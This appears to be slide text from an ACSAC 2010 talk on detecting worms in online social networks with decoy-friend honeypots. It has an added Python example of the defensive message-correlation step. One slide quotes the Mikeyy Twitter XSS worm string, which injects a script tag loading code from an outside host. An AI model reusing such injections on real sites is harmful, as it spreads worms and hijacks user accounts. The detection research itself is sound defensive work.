Toward Worm Detection in Online Social Networks. Wei Xu, Fangfang Zhang, and Sencun Zhu. ACSAC 2010
OUTLINE • Introduction • Related Work • System Design • Evaluation • Limitation and Discussion • Conclusion
Introduction - Worm • Worm • Scanning • Attack string • XSS Worm • XSS Vulnerability • OSN (Online Social Networking) Worm • Messages • URL link
Twitter XSS Worm • var xss = urlencode('http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ');
Related Work • Worm detection, early warning and response based on local victim information. ACSAC (2004) • And many worm detection approaches… • Rely on scanning traffic/detailed infection procedure • Fast detection and suppression of instant messaging malware in enterprise-like networks. ACSAC (2007) • HoneyIM
Idea • OSN • High clustering property • Monitor the “popular” user • “Decoy friend” • Idea of honeypot • Add into a normal user’s friends list
System Design • Like a lightweight NIDS
System Design • Configuration module • Social graph • Evidence collecting module • Gathers suspicious worm propagation evidence • Worm detection module • Identifies and reports worms • Communication module • Just for communication
Evidence collecting module • Decoy friend • As a low-interaction honeypot • Receives worm evidence • Questions about decoy friends • Information leak • User’s reluctance • How to collect only suspicious worm evidence
Configuration module • Selecting normal users and assigning decoy friends to these users • Two decoy friends for each user • Selecting normal users • Limiting the number of decoy friends • Preserving the detection effectiveness
Configuration module • Question: A directed graph G = (V,E) user connection between two users • Extended dominating set problem • Minimum vertex set • Or exists a path from to where and the length of this path is at most hops.
Configuration module • Make it simple • Set r = 2 • Not necessary to cover the entire social graph • Power law distribution • 20% of users have no connections • Maximum Coverage Problem • Given a social graph G = (V,E) and a number k, choose a set of vertices of size at most k such that the number of other vertices covered by this set with coverage radius r = 2 is maximized
Worm detection module • Def: suspicious propagation evidence list (SPEL) • {decoy friend ID, receiving time, content} • Event: get any SPEL • Keep it for a short period of time • Step 1: Local Correlation • Compare two decoy friends (from the same user) • Step 2: Network Correlation • Compare all saved SPEL
Worm detection module • Compare SPEL • If similarity is over 90% → Alert • Similarity • Edit distance of content in SPEL
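An added example, not code from the paper or the slides: the two-step SPEL correlation described above, run over constructed messages. The normalisation of edit distance into a similarity score, the 600-second retention period, the skipping of same-decoy comparisons, and all names are assumptions.

```python
from dataclasses import dataclass

THRESHOLD = 0.90   # from the slides: similarity over 90% raises an alert
RETENTION = 600    # assumed: seconds an SPEL entry is kept before it is dropped

@dataclass
class Spel:        # {decoy friend ID, receiving time, content}
    decoy_id: str
    time: float
    content: str

def edit_distance(a, b):
    # Levenshtein distance, two-row dynamic programming.
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def similarity(a, b):
    # Assumed normalisation: 1 - distance / length of the longer message.
    longest = max(len(a), len(b))
    return 1.0 if longest == 0 else 1.0 - edit_distance(a, b) / longest

class Detector:
    def __init__(self, decoy_owner):
        self.decoy_owner = decoy_owner   # decoy friend ID -> monitored normal user
        self.saved = []

    def receive(self, ev):
        # Returns (step, matching decoy ID) alerts raised by a new SPEL entry.
        self.saved = [s for s in self.saved if ev.time - s.time <= RETENTION]
        alerts = []
        for old in self.saved:
            if old.decoy_id == ev.decoy_id:   # assumed: a decoy is not compared with itself
                continue
            if similarity(old.content, ev.content) > THRESHOLD:
                same = self.decoy_owner[old.decoy_id] == self.decoy_owner[ev.decoy_id]
                alerts.append(("local" if same else "network", old.decoy_id))
        self.saved.append(ev)
        return alerts

def demo():
    # Constructed sample: d1/d2 are decoy friends of user alice, d3 of user bob.
    det = Detector({"d1": "alice", "d2": "alice", "d3": "bob"})
    worm = "Check out this video http://example.test/v?id="
    events = [Spel("d1", 0, worm + "1"), Spel("d2", 5, worm + "2"),
              Spel("d3", 20, worm + "3"), Spel("d3", 1000, worm + "4")]
    return [det.receive(e) for e in events]
```

The last constructed event arrives after the retention period, so nothing is left to correlate with and no alert is raised, which is the time-delay limitation the slides raise later.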
Evaluation • Flickr • 1,846,198 users • 22,613,981 friend links • 1. Test Koobface worm and Mikeyy worm • 2. Different worm behavior • 3. Different size of selected user set (with decoy friends)
Evaluation 1 • Koobface: different messages, all friends • Mikeyy: same messages, all friends • Maximum infection 2420 (0.13%)
Evaluation 2 • Infection Number versus Different Percentages of Friends lists
Evaluation 3 • 2937.85 (0.16%)
Limitation & Discussion • False positive? • Outbreak of a large-scale event • A posted link in a suspicious message points to a well-known website – OK • Otherwise – rare case, manual checking? • Time delay • Keep messages longer
Conclusion • A new problem – OSN worm • Monitor a few hundred users to detect OSN worms • Effectively detect OSN worms (0.13%)